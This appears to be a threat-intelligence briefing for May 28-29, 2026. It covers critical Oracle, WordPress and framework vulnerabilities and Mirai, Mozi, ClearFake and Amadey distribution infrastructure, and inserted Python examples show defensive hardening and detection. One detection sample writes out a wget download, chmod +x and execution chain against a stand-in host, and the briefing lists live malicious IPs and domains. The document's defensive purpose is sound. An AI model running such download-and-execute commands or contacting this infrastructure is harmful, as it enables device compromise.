This briefing covers the 24-hour period from May 28-29, 2026, revealing a landscape dominated by critical vulnerabilities in enterprise systems and sustained malware distribution campaigns. The most significant findings include multiple CVSS 10.0 and 9.8+ vulnerabilities affecting Oracle products, WordPress plugins, and various development frameworks that could enable complete system compromise. Oracle REST Data Services and E-Business Suite products face particularly severe exposure with multiple critical flaws allowing unauthenticated remote code execution and privilege escalation.
Malware distribution activity remains robust with 50 malicious URLs identified, primarily distributing Mirai botnet variants and Mozi malware targeting IoT and router devices. The infrastructure at 176.65.139.111 and 176.65.139.36 shows coordinated multi-architecture Mirai distribution, while ConnectWise ScreenConnect tooling abuse was observed for initial access. ClearFake campaigns continue leveraging fake update delivery mechanisms. The concentration of ELF binaries targeting MIPS, ARM, and x86 architectures indicates ongoing efforts to compromise edge devices for DDoS and proxy operations.
Organizations should prioritize immediate patching of Oracle products, particularly REST Data Services versions 24.2.0-26.1.0 and E-Business Suite components. Secondary focus should address WordPress ACF Extended plugin updates and development framework vulnerabilities. Network defenders should enhance monitoring for Mirai/Mozi infection indicators and implement strict egress filtering to prevent IoT device compromise.
Multiple CVSS 9.8-10.0 vulnerabilities identified across Oracle products, WordPress plugins, and development frameworks enabling remote code execution and complete system compromise
Easily exploitable vulnerability in Oracle REST Data Services Backend-as-a-Service component (versions 24.2.0-26.1.0) allows unauthenticated attackers with network access via HTTPS to achieve complete compromise. Maximum severity rating indicates potential for full system control without authentication.
Marten's full-text search APIs (prior to 8.36.1) fail to parameterize user-supplied regConfig parameters, directly interpolating them into SQL queries. Every code path exposing regConfig to untrusted input is vulnerable to SQL injection allowing complete database compromise.
Oracle E-Business Suite Payments component (versions 12.2.3-12.2.15) contains easily exploitable vulnerability allowing unauthenticated attackers with HTTP network access to compromise the File Transmission component, potentially exposing payment processing systems.
Advanced Custom Fields: Extended plugin (all versions up to 0.9.2.5) contains validation bypass vulnerability in after_validate_save_post() function that unconditionally trusts attacker-controlled _acf_post_id parameter, enabling privilege escalation to administrative access.
Oracle REST Data Services Core component (versions 24.2.0-26.1.0) vulnerable to compromise by low-privileged attackers via HTTPS. While requiring authentication, successful exploitation enables attacks beyond the vulnerable component scope.
Separate critical vulnerability in Oracle REST Data Services Core (versions 24.2.0-26.1.0) allowing low-privileged authenticated attackers to compromise the system via HTTPS with impacts extending beyond the vulnerable component.
Exposed methods allow authenticated users to create and execute arbitrary JavaScript code on the server with full system access. Commands execute with root privileges enabling complete system compromise through a simple authenticated interface.
Difficult to exploit vulnerability in Oracle Database Server Net Service component (versions 23.4.0-23.26.2) allows unauthenticated attackers with network access via TLS to compromise the system. While difficult to exploit, successful attacks have severe cross-component impact.
Multiple high-severity vulnerabilities affecting Oracle E-Business Suite components including Payroll, Universal Work Queue, and iAssets modules enabling privilege escalation and unauthorized access
Oracle E-Business Suite Universal Work Queue component (versions 12.2.3-12.2.15) vulnerable to compromise by low-privileged attackers via HTTP. Work Provider Site Level Administration component easily exploitable for complete system compromise.
Oracle iAssets component Internal Operations (versions 12.2.3-12.2.15) easily exploitable by low-privileged attackers via HTTP, with successful attacks extending beyond the vulnerable component to affect broader E-Business Suite deployment.
Oracle E-Business Suite Internet Procurement Connector (versions 12.2.3-12.2.15) allows unauthenticated attackers with HTTP network access to compromise Internal Operations component, potentially exposing procurement systems and data.
Oracle Payroll Self Service Manager component (versions 12.2.3-12.2.15) vulnerable to compromise by low-privileged attackers via HTTP, potentially enabling unauthorized access to payroll information and operations.
Oracle Payroll Internal Operations component (versions 12.2.3-12.2.15) easily exploitable by low-privileged attackers via HTTPS, enabling unauthorized payroll system access and potential data manipulation.
Oracle E-Business Suite Flow Manufacturing Security component (versions 12.2.9-12.2.15) allows low-privileged attackers with SQL network access to compromise the system, affecting manufacturing operations integrity.
High-severity vulnerabilities in popular development frameworks and applications including path traversal, command injection, and configuration manipulation issues
Portainer Community Edition (versions 2.33.0 to before 2.33.8, 2.39.2, 2.41.0) proxies Kubernetes cluster requests through middleware layer without proper authentication enforcement, potentially exposing cluster management interfaces to unauthorized access.
Portainer Community Edition (versions 2.33.0 to before 2.33.8, 2.39.2, 2.41.0) environment-level 'Disable bind mounts for non-administrators' setting can be bypassed, allowing unauthorized container escape and host filesystem access.
LinkAce (prior to 2.5.6) setup database configuration flow accepts attacker-controlled database credentials and writes them to .env file without escaping, enabling remote configuration manipulation on uninitialized instances.
Billy filesystem abstraction for Go (prior to 5.9.0) contains multiple path traversal vulnerabilities across components due to insufficient path sanitization. Crafted paths using '..' sequences can escape intended base directories.
AnythingLLM (prior to 1.13.0) filesystem-search-files agent skill passes LLM-controlled pattern parameter to ripgrep as positional argument without end-of-options separator, enabling command injection through specially crafted search patterns.
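The flaw class above is argument injection: an untrusted value placed where a CLI parser may still be reading options. The following is an added example, not AnythingLLM's code, showing the vulnerable argv shape beside a hardened one and a small check that tells them apart. It assumes ripgrep's real `-e`, `--no-config` and `--max-count` options and the POSIX `--` end-of-options convention; nothing is executed, the argv is only built and inspected.

```python
def option_like(value):
    """True when a value would be read as a flag if it reached a CLI parser unprotected."""
    return value.startswith("-") and value != "-"


def vulnerable_rg_argv(pattern, search_dir):
    # The shape described in the advisory: the pattern sits where options are still parsed.
    return ["rg", pattern, search_dir]


def hardened_rg_argv(pattern, search_dir, max_count=50):
    """Every untrusted value is either bound to an explicit option (-e) or placed after '--'.
    --no-config keeps the environment (RIPGREP_CONFIG_PATH) from adding flags either."""
    for value in (pattern, search_dir):
        if "\x00" in value:
            raise ValueError("NUL byte in argument")
    return ["rg", "--no-config", "--max-count", str(max_count),
            "-e", pattern,      # -e consumes the next token as a pattern, never as an option
            "--", search_dir]   # after '--' ripgrep treats every token as a path


def exposed_untrusted(argv, untrusted):
    """Return the untrusted values a parser could read as options: they begin with '-',
    sit before the '--' separator, and are not bound by an explicit -e/--regexp."""
    exposed = []
    for i, tok in enumerate(argv):
        if tok == "--":
            break
        bound = i > 0 and argv[i - 1] in ("-e", "--regexp")
        if tok in untrusted and option_like(tok) and not bound:
            exposed.append(tok)
    return exposed


def run_search(pattern, search_dir, runner=None):
    """Invoke ripgrep with the hardened argv; shell=False so no shell parsing happens at all."""
    import subprocess
    run = runner or subprocess.run
    return run(hardened_rg_argv(pattern, search_dir), capture_output=True, text=True, shell=False)
```

The same rule applies to any subprocess fed model output or user input: bind each value to a named option or place it after `--`, and never pass the command through a shell.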
Better Auth (prior to 1.4.17 and 1.5.0-beta.9) HTTP rate limiter keys requests by exact textual IP from x-forwarded-for header. IPv6 clients controlling typical /64 subnets can bypass rate limiting through IP rotation.
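As an added example (not Better Auth's code) of the two fixes this finding calls for: derive the client address from the rightmost non-proxy hop of X-Forwarded-For rather than trusting the header text, and bucket IPv6 clients by /64 so that rotating addresses inside one delegated prefix share a single rate-limit counter. The trusted-proxy range is a constructed assumption; only the standard library `ipaddress` module is used.

```python
import ipaddress

# Constructed assumption: the address range our own load balancers use.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def _is_trusted_proxy(text):
    try:
        addr = ipaddress.ip_address(text)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip_from_xff(xff, peer_ip):
    """Walk X-Forwarded-For from the right, skipping hops that are our own proxies.
    The first address that is not a trusted proxy is the client; anything further left was
    appended by whoever connected to us and is attacker-controlled."""
    hops = [h.strip() for h in xff.split(",") if h.strip()] if xff else []
    candidate = peer_ip
    for hop in reversed(hops):
        if not _is_trusted_proxy(candidate):
            break
        candidate = hop
    return candidate


def rate_limit_key(ip_text):
    """Bucket IPv6 to its /64 so rotation within a delegated prefix shares one counter.
    IPv4 (including IPv4-mapped IPv6) keeps the host address; malformed input shares one bucket."""
    try:
        addr = ipaddress.ip_address(ip_text)
    except ValueError:
        return "invalid"
    if addr.version == 6:
        if addr.ipv4_mapped is not None:
            return str(addr.ipv4_mapped)
        return str(ipaddress.ip_network("%s/64" % addr, strict=False))
    return str(addr)


def effective_key(xff, peer_ip):
    """What the limiter should actually count on: trusted-hop client address, then bucketed."""
    return rate_limit_key(client_ip_from_xff(xff, peer_ip))
```

The /64 choice matches the typical residential or hosting delegation; a deployment that sees larger delegations (/56 or /48) would widen the bucket accordingly, at the cost of grouping more unrelated clients.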
Usagi-org ai-goofish-monitor contains unauthenticated arbitrary file read in GET /api/prompts/(unknown) endpoint on Windows deployments. Attackers can read arbitrary files using absolute Windows paths or backslash-based traversal sequences.
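Both the Billy path traversal finding and the ai-goofish-monitor file read above come down to the same missing check: a user-supplied path joined under a base directory without verifying that the result stays inside it. The following is an added example (not code from either project) of a lexical containment check: it normalises away every `..`, refuses a leading `/` from resetting to the filesystem root, treats backslashes as separators so Windows-style traversal is not missed, and rejects drive-letter absolute paths outright. The base directory and inputs are constructed.

```python
import posixpath
import re

WINDOWS_DRIVE = re.compile(r"^[A-Za-z]:")


def safe_join(base, user_path):
    """Join user_path under base and return the normalised result, or raise ValueError
    if the result would lie outside base. The check is lexical: every '..' is resolved
    before the prefix comparison, so 'docs/../../etc/passwd' is caught as well as '../'."""
    base_norm = posixpath.normpath(base)
    if not base_norm.startswith("/"):
        raise ValueError("base must be an absolute path")
    rel = user_path.replace("\\", "/")         # backslash traversal is traversal too
    if WINDOWS_DRIVE.match(rel):
        raise ValueError("absolute Windows path rejected: %r" % user_path)
    rel = rel.lstrip("/")                      # a leading '/' must not reset to the root
    candidate = posixpath.normpath(posixpath.join(base_norm, rel))
    # Compare against base + '/' so that '/srv/datafoo' is not accepted for base '/srv/data'.
    if candidate != base_norm and not candidate.startswith(base_norm + "/"):
        raise ValueError("path escapes base directory: %r" % user_path)
    return candidate


def is_contained(base, user_path):
    """Boolean form of safe_join for filters and tests."""
    try:
        safe_join(base, user_path)
        return True
    except ValueError:
        return False
```

For an in-memory or chrooted abstraction the lexical check is the whole story; on a real filesystem it must be followed by resolving the final path with `os.path.realpath` and repeating the prefix comparison, otherwise a symlink inside the base can still point outside it.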
Lakeside SysTrack Agent (prior to 11.2.1.28, 11.3.0.38, 11.4.0.24, 11.5.0.15) contains out-of-bounds read vulnerability in Command ID 30 UDP packet handler. Remote attackers can crash the application via specially crafted UDP packets.
Active Mirai botnet infrastructure distributing malware across multiple architectures from 176.65.139.x network, targeting IoT devices and routers for botnet recruitment
Coordinated malware distribution from 176.65.139.111 hosting Mirai ELF binaries for ARM (arm, arm5, arm7), MIPS (mpsl), x86, x86_64, and i686 architectures. The wget user-agent indicates command-line downloads, suggesting automated infection scripts targeting diverse device types.
Secondary distribution node at 176.65.139.36 serving Mirai variants for PPC, x86, MIPS, ARM (arm, arm5, arm6, arm7), SH4, M68K, MPSL, and SPC architectures. Comprehensive architecture coverage indicates sophisticated IoT botnet expansion targeting embedded systems, routers, and network equipment.
Distribution server at 45.85.218.109 hosting 'iran.*' named Mirai binaries across 14 architectures plus payload.sh loader script. Naming convention suggests geographically-targeted or themed campaign. Comprehensive architecture support (including MIPS router, ARC, SPARC) indicates broad IoT targeting.
Continued Mozi botnet activity targeting MIPS-based devices alongside ConnectWise tool abuse and ClearFake social engineering campaigns
Ten distinct IP addresses distributing Mozi botnet malware targeting 32-bit MIPS and ARM ELF binaries. Sources include 110.36.65.9, 219.156.100.198, 123.188.105.51, 110.167.80.155, 110.37.113.30, 222.137.145.223, 42.237.48.166, 182.124.160.52, 110.39.235.153, and 61.53.123.9. Primary targets are routers and IoT devices with MIPS processors.
Two URLs hosting ConnectWise ScreenConnect client executables (support.client.exe and ScreenConnect.ClientSetup.exe) on 178.16.55.11 via HTTPS. Legitimate remote access tool frequently abused for initial access and persistence in intrusion operations.
ClearFake malware distribution via visszateritok.net and visszateritok.hu domains using UUID-based URLs. ClearFake campaigns typically involve fake browser update prompts to deliver malware through social engineering, targeting users in specific geographic regions.
URL at 91.92.242.236 distributing file_f49922ef9bcf1f82.exe identified as payload dropped by Amadey malware loader. Amadey typically serves as initial infection vector for additional malware deployment including ransomware, stealers, and banking trojans.
Distribution of certificado.exe (Spanish for 'certificate') from 178.16.54.243 via HTTPS using wget user-agent. File naming suggests social engineering approach targeting Spanish-speaking users with fake certificate or security update themes.
Analysis of observed attack patterns reveals multi-architecture malware distribution, exploitation of legitimate tools, and geographic targeting strategies
Threat actors are deploying comprehensive multi-architecture malware sets (12-14 variants per campaign) targeting ARM, MIPS, x86, PowerPC, SPARC, SH4, M68K, and ARC processors. This approach maximizes infection potential across diverse IoT ecosystems including routers, NAS devices, DVRs, and embedded systems. Single distribution servers hosting complete architecture sets indicate automated deployment infrastructure.
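When a drop directory like the ones described for 176.65.139.111, 176.65.139.36 and 45.85.218.109 is retrieved for analysis, the first triage question is which architectures it covers, and file names alone ("mpsl", "spc", "iran.*") cannot be trusted. This added example (not from any project on the page) reads class, byte order and `e_machine` straight from the ELF header using the constants in `elf.h`, and counts distinct machine families as the multi-arch-kit heuristic. The sample drop is constructed from minimal headers; only the bytes `elf_info` reads are populated.

```python
import struct

# e_machine constants from the ELF specification (elf.h), limited to the families named above.
E_MACHINE = {
    2: "SPARC", 3: "x86", 4: "M68K", 8: "MIPS", 18: "SPARC32PLUS", 20: "PPC", 21: "PPC64",
    40: "ARM", 42: "SH", 43: "SPARCV9", 45: "ARC", 62: "x86_64", 93: "ARC_COMPACT", 183: "AArch64",
}
E_TYPE = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}


def elf_info(data):
    """Read class, byte order, type and machine from an ELF header; None if the data is not ELF."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    ei_class, ei_data = data[4], data[5]          # EI_CLASS: 1=32-bit 2=64-bit; EI_DATA: 1=LE 2=BE
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack_from(endian + "HH", data, 16)   # e_type @16, e_machine @18
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "type": E_TYPE.get(e_type, "unknown(%d)" % e_type),
        "machine": E_MACHINE.get(e_machine, "unknown(%d)" % e_machine),
    }


def make_elf_header(ei_class, ei_data, e_machine, e_type=2):
    """Constructed minimal 64-byte header for testing; only the fields elf_info reads are set."""
    endian = "<" if ei_data == 1 else ">"
    ident = b"\x7fELF" + bytes([ei_class, ei_data, 1]) + b"\x00" * 9
    return ident + struct.pack(endian + "HH", e_type, e_machine) + b"\x00" * 44


# Constructed drop directory using the suffix convention seen on the distribution servers.
SAMPLE_DROP = {
    "bot.mips": make_elf_header(1, 2, 8),      # MIPS big-endian
    "bot.mpsl": make_elf_header(1, 1, 8),      # MIPS little-endian ("mpsl")
    "bot.arm7": make_elf_header(1, 1, 40),
    "bot.x86": make_elf_header(1, 1, 3),
    "bot.x86_64": make_elf_header(2, 1, 62),
    "bot.ppc": make_elf_header(1, 2, 20),
    "bot.sh4": make_elf_header(1, 1, 42),
    "bot.m68k": make_elf_header(1, 2, 4),
    "bot.spc": make_elf_header(1, 2, 2),
    "bot.arc": make_elf_header(1, 1, 93),
    "payload.sh": b"#!/bin/sh\n",             # the loader script is not ELF
}


def triage(drop):
    """Map each file name to its header facts; non-ELF files map to None."""
    return {name: elf_info(data) for name, data in drop.items()}


def machine_families(drop):
    """Distinct machine families in the drop; a high count is the multi-architecture-kit signal."""
    return {info["machine"] for info in triage(drop).values() if info}
```

Checking `e_machine` rather than the suffix also catches mislabelled or renamed binaries, and the (bits, endian, machine) triple is what to record alongside the hash when the sample is shared.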
Consistent wget user-agent strings across malware distribution URLs indicate command-line download mechanisms. Infection typically proceeds through: initial compromise → shell command execution → wget/curl download → chmod +x → execution. Defenders should monitor for wget processes spawned by unexpected parent processes and for downloads from non-standard ports.
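The detection guidance above can be expressed as two rules over process telemetry: score each wget/curl launch on its parent, destination and output path, and correlate the download → chmod +x → execution chain on one file path. This added example (not from any product) runs both rules over constructed process events; the parent allowlist, the 198.51.100.23:8080 URL and the Debian mirror URL are constructed sample values, and the field names (`parent`, `image`, `cmdline`) are an assumed telemetry schema.

```python
import ipaddress
import re
from urllib.parse import urlsplit

DOWNLOADERS = {"wget", "curl"}
# Constructed allowlist: parents that legitimately spawn downloaders on this host class.
ALLOWED_PARENTS = {"apt-get", "apt", "dnf", "yum", "pip", "pip3", "ansible"}
URL_RE = re.compile(r"https?://[^\s'\"]+")
OUT_RE = re.compile(r"(?:-O|-o|--output|--output-document)[ =](\S+)")
TMP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")


def basename(path):
    return path.rsplit("/", 1)[-1]


def classify_download(ev):
    """Reasons a wget/curl event looks like a malware fetch; empty when benign or not a downloader."""
    reasons = []
    if basename(ev["image"]) not in DOWNLOADERS:
        return reasons
    if basename(ev["parent"]) not in ALLOWED_PARENTS:
        reasons.append("unexpected-parent")
    for url in URL_RE.findall(ev["cmdline"]):
        u = urlsplit(url)
        port = u.port or (443 if u.scheme == "https" else 80)
        if port not in (80, 443):
            reasons.append("non-standard-port")
        try:
            ipaddress.ip_address(u.hostname)      # raises for DNS names (and for None)
            reasons.append("ip-literal-host")
        except ValueError:
            pass
    m = OUT_RE.search(ev["cmdline"])
    if m and m.group(1).startswith(TMP_DIRS):
        reasons.append("writes-to-world-writable-dir")
    return reasons


def chmod_adds_exec(cmdline):
    """True for 'chmod +x', 'chmod a+x', or an octal mode with any execute bit set."""
    for tok in cmdline.split()[1:]:
        if "+x" in tok:
            return True
        if re.fullmatch(r"[0-7]{3,4}", tok) and any(int(d) & 1 for d in tok[-3:]):
            return True
    return False


def find_download_execute_chains(events):
    """Correlate download -> chmod (exec bit) -> execution of the same path, in event order."""
    downloaded, chmodded, chains = {}, {}, []
    for i, ev in enumerate(events):
        img, cmd = basename(ev["image"]), ev["cmdline"]
        if img in DOWNLOADERS:
            m = OUT_RE.search(cmd)
            if m:
                downloaded[m.group(1)] = i
        elif img == "chmod" and chmod_adds_exec(cmd):
            for path in downloaded:
                if path in cmd.split():
                    chmodded[path] = i
        elif ev["image"] in chmodded:
            chains.append({"path": ev["image"], "download": downloaded[ev["image"]],
                           "chmod": chmodded[ev["image"]], "exec": i})
    return chains


def alerts(events):
    """(index, reasons) for every downloader event that scored at least one reason."""
    return [(i, classify_download(ev)) for i, ev in enumerate(events) if classify_download(ev)]


# Constructed process telemetry (not real logs): one loader-style chain, one benign package fetch.
EVENTS = [
    {"parent": "/bin/busybox", "image": "/usr/bin/wget",
     "cmdline": "wget http://198.51.100.23:8080/bins/x86 -O /tmp/x86"},
    {"parent": "/bin/sh", "image": "/bin/chmod", "cmdline": "chmod +x /tmp/x86"},
    {"parent": "/bin/sh", "image": "/tmp/x86", "cmdline": "/tmp/x86"},
    {"parent": "/usr/bin/apt-get", "image": "/usr/bin/curl",
     "cmdline": "curl -fsSL https://deb.debian.org/debian/pool/main/e/example.deb"
                " -o /var/cache/apt/archives/example.deb"},
]
```

The per-event rule is noisy on its own (admins do fetch from IP literals); the chain rule is the high-confidence one, and the two are meant to be combined: a chain whose download event also scored "unexpected-parent" is the case to page on.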
ConnectWise ScreenConnect distribution represents continued trend of abusing legitimate remote administration tools. These tools provide persistent access, encrypted communications, and reduced detection likelihood compared to custom RATs. Organizations should implement strict whitelisting for remote access tools and monitor for unauthorized installations.